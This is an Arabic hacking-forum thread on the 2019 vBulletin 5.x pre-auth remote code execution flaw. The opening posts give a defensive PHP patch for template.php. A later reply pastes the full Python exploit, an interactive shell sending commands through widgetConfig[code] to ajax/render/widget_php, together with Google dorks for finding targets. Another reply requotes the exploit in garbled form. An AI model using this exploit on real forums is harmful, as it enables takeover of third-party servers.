TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > قسم الأخبار التقنية والنقاشات الجادة

قسم الأخبار التقنية والنقاشات الجادة طرح جميع النقاشات الجادة والاخبار اليوميه التي تخص اختراق المواقع وتبعاتها ...

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 25-09-2019, 05:32 PM
الصورة الرمزية Cwne
Cwne
:: عضو خاص ::
 
حـالة التــواجـد : Cwne غير متواجد حالياً
تاريخ التسجيل: May 2016
الجــــنــــــس: ذكـر
المشاركات: 174
شكراً:471
تم شكره 382 مرة في 107 مشاركة
معدل تقييم المستوى: 0
Cwne بدون تقييم
افتراضي الحماية من ثغرة vBulletin 5.x 0day pre-auth RCE

السلام عليكم ورحمة الله وبركاته، كيف حالكم اخوتي؟ اتمنى ان تكونو بتمام الصحة والعافية إن شاء الله.


كما علمنا في الفترة الاخيرة ظهور ثغرة 0day في سكربت vBulletin الاصدار الاخير وحتى احدث باتش للاصدار، كلها مصابة إلى هذه اللحظة.


https://www.sec4ever.com/home/showthread.php?t=19645




وبسبب ان الثغرة وقعت بأيدي الكثير من اطفال الاختراق، كان ولا بد على المسلم ان يتخذ الاجراءات اللازمة لحماية اخوته من مثل هذه الثغرات التي يستغلها الاطفال لاظهار انفسهم هنا وهناك فقط.




وللحماية من هذه الثغرة عليك ان تذهب إلي هذا المسار.



اقتباس:
/includes/vb5/
 
وأن تبحث عن ملف


اقتباس:
template.php
 
وابحث عن هذا السطر


كود PHP:
@eval($templateCode); 
والذي هو بدوره يكون سطر رقم 280


وقم بإضافة هذا السطر قبله.


كود PHP:
if(isset($widgetConfig['code'])){ $widgetConfig['code'] = escapeshellcmd($widgetConfig['code']); } 
وفي حالة تواجد سطرين عند البحث، فقط السطر الاول الذي يلزمنا حمايته، والذي بدوره يكون موجود بداخل دالة render();


واتمنى ان اكون وفقت في طرحي لهذا الموضوع، ونسأل الله العلي العظيم ان يوفقكم اجمعين.
وإن كان من توفيق فهو من عند الله وحده لا شريك له، وإن كان من خطأ او تقصير فمني ومن الشيطان.  

 

 

سُبحانَك اللّهم وبحمدِك عَدد خَلقِك ورِضا نفسِك وزِنةَ عرشِك ومِدادَ كَلماتِك
رضيت بالله رباً وبالإسلام ديناً وبمُحمدٍ صلَ الله عليهِ وَسلمَ نبياً ورسولاً
....
قال بعض السلف: من عمل في السر عملاً يستحي منه في العلانية، فليس لنفسه عنده قدر.
....
فقد أخبرنا النبي صلى الله عليه وسلم بذلك فقال: "دعوة المرء المسلم لأخيه بظهر الغيب مستجابة، عند رأسه ملك موكل به، كلما دعا لأخيه قال الملك الموكل به: آمين ولك بمثل." رواه مسلم.
وقال النووي في شرح مسلم: وَكَانَ بَعْض السَّلَف إِذَا أَرَادَ أَنْ يَدْعُو لِنَفْسِهِ يَدْعُو لِأَخِيهِ الْمُسْلِم بِتِلْكَ الدَّعْوَة؛ لِأَنَّهَا تُسْتَجَاب، وَيَحْصُل لَهُ مِثْلهَا.
رد مع اقتباس
15 أعضاء قالوا شكراً لـ Cwne على المشاركة المفيدة:
  #2  
قديم 26-09-2019, 08:41 PM
الصورة الرمزية Cwne
Cwne
:: عضو خاص ::
 
حـالة التــواجـد : Cwne غير متواجد حالياً
تاريخ التسجيل: May 2016
الجــــنــــــس: ذكـر
المشاركات: 174
شكراً:471
تم شكره 382 مرة في 107 مشاركة
معدل تقييم المستوى: 0
Cwne بدون تقييم
افتراضي رد: الحماية من ثغرة vBulletin 5.x 0day pre-auth RCE

السلام عليكم ورحمة الله وبركاته، شكرا للاخوة على التنبيه، واخص بالذكر الاخ MA DANGER
فقام بتنبيهي على انه اكواد الاصدارات الاحدث مختلفة، ذلك لجأت ﻹعادة النظر في الاكواد الحديثة لاصلاح الثغرة،


فيكون الاصلاح والذي بدوره يعمل على كل الاصدارات التي قمت بتجربتها. 5.1.2 و 5.5.2 و 5.2.3


نذهب إلى نفس الملف، ونبحث عن هذا السطر

كود PHP:
$templateCode $templateCache->getTemplate($this->template); 
ونقوم بإضافة نفس سطر الاصلاح اسفل منه.


اقتباس:
المشاركة الأصلية كتبت بواسطة Cwne مشاهدة المشاركة

كود PHP:
if(isset($widgetConfig['code'])){ $widgetConfig['code'] = escapeshellcmd($widgetConfig['code']); } 



ويكون بهذه الطريقة حل الثغرة. ولكن على الاخوة الذين يمتلكون نسخة مدفوعة من السكربت التحديث للباتش الجديد، لانه فيه تم اصلاح الثغرة بواسطة الشركة المبرمجة.


ونسأل الله العلي العظيم ان يوفقكم وان يجازي اخانا MA DANGER خير الجزاء على التذكير، وعلى الموقع الذي قام بسد الثغرة به إن شاء الله.  

 

 

سُبحانَك اللّهم وبحمدِك عَدد خَلقِك ورِضا نفسِك وزِنةَ عرشِك ومِدادَ كَلماتِك
رضيت بالله رباً وبالإسلام ديناً وبمُحمدٍ صلَ الله عليهِ وَسلمَ نبياً ورسولاً
....
قال بعض السلف: من عمل في السر عملاً يستحي منه في العلانية، فليس لنفسه عنده قدر.
....
فقد أخبرنا النبي صلى الله عليه وسلم بذلك فقال: "دعوة المرء المسلم لأخيه بظهر الغيب مستجابة، عند رأسه ملك موكل به، كلما دعا لأخيه قال الملك الموكل به: آمين ولك بمثل." رواه مسلم.
وقال النووي في شرح مسلم: وَكَانَ بَعْض السَّلَف إِذَا أَرَادَ أَنْ يَدْعُو لِنَفْسِهِ يَدْعُو لِأَخِيهِ الْمُسْلِم بِتِلْكَ الدَّعْوَة؛ لِأَنَّهَا تُسْتَجَاب، وَيَحْصُل لَهُ مِثْلهَا.
رد مع اقتباس
3 أعضاء قالوا شكراً لـ Cwne على المشاركة المفيدة:
  #3  
قديم 29-09-2019, 12:07 PM
الصورة الرمزية Federal
Federal
عضو نشيط
 
حـالة التــواجـد : Federal غير متواجد حالياً
تاريخ التسجيل: Jun 2010
مكـان الإقامـة : C:
الجــــنــــــس: ذكـر
المشاركات: 31
شكراً:22
تم شكره 19 مرة في 15 مشاركة
معدل تقييم المستوى: 0
Federal على طريق التميز
افتراضي رد: الحماية من ثغرة vBulletin 5.x 0day pre-auth RCE

كود PHP:
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit

# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys

if len(sys.argv) != 2:
    
sys.exit("Usage: %s <URL to vBulletin>" sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while 
True:
     try:
          
cmd raw_input("vBulletin$ ")
          
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          
requests.post(url sys.argv[1], data params)
          if 
r.status_code == 200:
               print 
r.text
          
else:
               
sys.exit("Exploit failed! :(")
     
except KeyboardInterrupt:
          
sys.exit("\nClosing shell...")
     
except Exceptione:
          
sys.exit(str(e)) 
 
رد مع اقتباس
  #4  
قديم 29-09-2019, 01:00 PM
الصورة الرمزية Dz-Sn!pEr
Dz-Sn!pEr
عضو مميز
 
حـالة التــواجـد : Dz-Sn!pEr غير متواجد حالياً
تاريخ التسجيل: Jan 2013
الجــــنــــــس: ذكـر
المشاركات: 156
شكراً:365
تم شكره 66 مرة في 48 مشاركة
معدل تقييم المستوى: 0
Dz-Sn!pEr بدون تقييم
افتراضي رد: الحماية من ثغرة vBulletin 5.x 0day pre-auth RCE

اقتباس:
المشاركة الأصلية كتبت بواسطة federal مشاهدة المشاركة

[code]#!/usr/bin/python
#
# vbulletin 5.x 0day pre-auth rce exploit
#
# this should work on all versions from 5.0.0 till 5.5.4
#
# google dorks:
# - site:*.vbulletin.net
# - "powered by vbulletin version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
Sys.exit("usage: %s <url to vbulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while true:
Try:
Cmd = raw_input("vbulletin$ ")
params["widgetconfig
كود:
"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               Print r.text
          else:
               Sys.exit("exploit failed! :(")
     except keyboardinterrupt:
          Sys.exit("\nclosing shell...")
     except exception, e:
          Sys.exit(str(e))
هذا استغلال لثغرة المطروحة لكن الاخ في الموضوع يتكلم عن طريقة الحماية من الثغرة لاصحاب المنتديات بالاصدارات المصابة  
رد مع اقتباس
  #5  
قديم 29-09-2019, 04:27 PM
الصورة الرمزية almalki
almalki
عضو جديد
 
حـالة التــواجـد : almalki متواجد حالياً
تاريخ التسجيل: Jun 2013
الجــــنــــــس: ذكـر
المشاركات: 14
شكراً:68
تم شكره 8 مرة في 3 مشاركة
معدل تقييم المستوى: 0
almalki بدون تقييم
افتراضي رد: الحماية من ثغرة vBulletin 5.x 0day pre-auth RCE

ممكن سكربت اذا سمحت
vBulletin 5.x.x  
رد مع اقتباس

الكلمات الدلالية (Tags)
0day, 5.x, exploit, fix, preauth, rce, vbulletin


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[شرح بالصور] vBulletin 5.x 0day pre-auth RCE exploit alzher قسم الأخبار التقنية والنقاشات الجادة 12 01-10-2019 09:31 PM
vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit MA DANGER قسم جديد ثغرات الأعضاء 33 03-11-2013 04:05 PM
[webapps / 0day] - Bintech Systems LLC Admin Auth Bypass Exploit inj3ct0r قسم جديد ثغرات مواقع الحماية 0 28-09-2011 10:00 PM
[webapps] - If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit exploit-db قسم جديد ثغرات مواقع الحماية 0 15-03-2011 05:10 PM


الساعة الآن 03:26 PM